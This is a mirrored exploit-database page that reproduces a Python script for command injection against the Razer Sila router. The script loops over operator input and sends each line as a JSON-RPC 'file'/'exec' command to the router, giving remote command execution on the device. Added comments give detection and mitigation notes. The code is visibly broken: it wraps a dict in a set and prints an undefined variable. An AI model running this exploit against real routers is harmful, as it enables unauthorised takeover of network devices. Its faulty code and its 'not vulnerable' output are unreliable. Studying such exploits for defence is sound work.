
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040085

Below is a copy:

Razer Sila - Command Injection (py)
# Exploit Title: Razer Sila - Command Injection (py)
# Google Dork: N/A
# Date: 2022-04-22
# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
# Contact: [email protected]
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

import requests
import sys
import json

# The target host is read from the first command-line argument as soon as the
# module is loaded, i.e. before the argument-count check at the bottom of the
# script is reached.
target = sys.argv[1]
# Static request headers attached to every POST made by main(). They imitate a
# browser XHR (fixed Firefox 78 User-Agent, X-Requested-With: XMLHttpRequest)
# and reuse the raw target string for Host, Origin and Referer.
# Detection note: every value here is a constant, so this header set together
# with a JSON-RPC "file"/"exec" request body is a usable fingerprint for this
# script as published when reviewing router or proxy logs; a modified copy
# would not necessarily match it.
h = {
    'Host': target,
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    # Fixed literal; it is not derived from the body that is actually sent.
    'Content-Length': '117',
    'Origin': target,
    'Referer': target,
    'Te': 'trailers',
    'Connection': 'close'
    }

def usage():
    """Print the script banner, the author contact line and an invocation example."""
    banner_lines = (
        "Razer Sila - Command Injection ",
        "Coded by Mohsen Dehghani [aka 0xProfessional]",
        "Contact to me: [email protected]",
        "Ex: python3 Exploit.py 127.0.0.1",
    )
    for text in banner_lines:
        print(text)
    
# Data Json
def main(url):
        """Interactive loop that forwards operator input to a JSON-RPC endpoint.

        Each iteration reads one line from stdin, places it in the "command"
        field of a JSON-RPC 2.0 "call" request whose other params are a fixed
        32-hex-character string, "file" and "exec", and POSTs that to *url*
        with the module-level header dict ``h``. Entering "quit" or "exit"
        leaves the loop before a request is made.

        Defensive reading: the security-relevant point is the request shape.
        A management API that accepts a caller-supplied string as the command
        of a file/exec RPC lets whoever can reach that API run commands on the
        device. Log review should look for POSTs carrying
        "method":"call" with "file" and "exec" in params; mitigation is to
        keep the management interface off untrusted networks and to apply
        vendor firmware updates where available.

        NOTE(review): the page does not say what the fixed 32-hex string
        represents or whether it is device-specific -- confirm before drawing
        conclusions about authentication requirements.

        NOTE(review): this listing has not been verified to run as published.
        Do not use its output as a vulnerability verdict: any non-200 status is
        reported as "not vulnerable" and any exception is reduced to "Error:(".
        """
        while(1):
                try:
                        # Operator-supplied text; it is embedded unchanged in
                        # the request structure below.
                        cmd = input("$")
                        dataJson = {
                        {"jsonrpc":"2.0","id":3,
                         "method":"call",
                         "params":["30ebdc7dd1f519beb4b2175e9dd8463e",
                                   "file",
                                   "exec",
                                   {"command":cmd}]}}
                        # The exit check runs after the structure is built but
                        # before anything is sent.
                        if cmd == 'quit' or cmd == 'exit':
                                break
                        req =  requests.post(url,headers=h,data=dataJson)

                        # Only the HTTP status is examined; the response is
                        # not checked for a JSON-RPC error object.
                        if req.status_code == 200:
                            for jsonData in req.content:
                                print(i['stdout'])

                        else:
                                # Any status other than 200 ends the session.
                                print("Router Not Vulnerable :(")
                                break
                # Bare except: every failure inside the loop body, whatever its
                # cause, prints the same message and the loop continues.
                except:
                        print("Error:(")
                                
# Script entry: exactly one command-line argument starts the interactive loop,
# anything else prints the usage banner. Ctrl-C exits without a traceback.
try:
    if len(sys.argv) != 2:
        usage()
    else:
        main(sys.argv[1])
except KeyboardInterrupt:
    sys.exit()
        
    

    


